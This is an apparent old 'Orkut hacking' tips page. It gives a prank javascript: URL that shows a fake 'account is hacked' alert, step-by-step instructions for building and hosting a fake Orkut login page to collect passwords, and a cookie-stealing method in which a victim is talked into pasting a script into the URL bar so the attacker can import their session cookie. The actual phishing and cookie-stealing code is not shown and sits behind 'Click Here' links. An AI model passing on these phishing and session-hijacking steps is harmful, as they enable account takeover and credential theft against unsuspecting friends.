Fooling Hacking-JavaScript!
* Copy and Scrap this JavaScript to your friends.
* Also say your friends that you are a Hacker.
* Tell them to Copy & Paste that JavaScript in their URL Bar.
* Don't forget to Edit the JavaScript with your name.
* Watch the fun, they will get scared.
javascript:function reverse() { var inp = " !atheM htraP yb dekcah si tnuocca tukrO ruoY "; var outp="";for (i = 0; i <= inp.length; i++) { outp =inp.charAt (i) + outp;}alert(outp) ;}; reverse();
Fake Login Hack!
* Open your Internet Explorer or Mozilla Firefox!* Open but don't Sign in there.
* Open the Page Source of it from the View menu and copy the whole code and save it as Orkut Page Source in your Notepad.
* Open Orkut Page Source that you had saved in Notepad, bring the cursor to the first line and press ctrl+f and type form and add < before form, it will search for it.
* Erase that whole line and the next line.
* You need to type a Code there in the same line which you had erased earlier. To get the Code, Click Here.
* Also rename your E-mail ID in the code.
* Now, press ctrl+f again and type there " g o o g l e _ t r a n s p a r e n t . g i f "> without spaces in between and type img src before " g o o g l e _ t r a n s p a r e n t . g i f "> and type < before img src, but keep space between img and src.
* It will search for it and then rename it by just typing " before google_transparent.gif">.
* Save this whole script as orkut.html.
* Now, go to or and make an account there.
* Login there and open File Manager and upload orkut.html.
* Check the URL there and now the site is all yours.
Cookie Steal Hack!
* You will need to download Mozilla Firefox even if you have a newer version of firefox, and install Add N Edit Cookies Add-on.* Go to your any friend's profile, click on Edit menu, click on View Source button.
* Press ctrl+f and type your own Orkut Profile name exactly.
* It will search for your name and that line would be something like this-
p class="thumb">"
* The numbers in red would be your GID number.
* You will need a Cookie Stealing Code for accessing the victim's account. To get the Code Click Here.
* Now, edit Type your GID here with your GID number.
* Ask the person whom you want to hack to Copy & Paste this script in his Scrapbook's URL Bar and hit Enter.
* The victim's cookie will come to your Scrapbook and will look something like this.
* Click on Edit, Copy and Paste the value in the Content box from ORKUTPREF=ID=…….till…….5hrrk=:, click on Save and refresh Firefox
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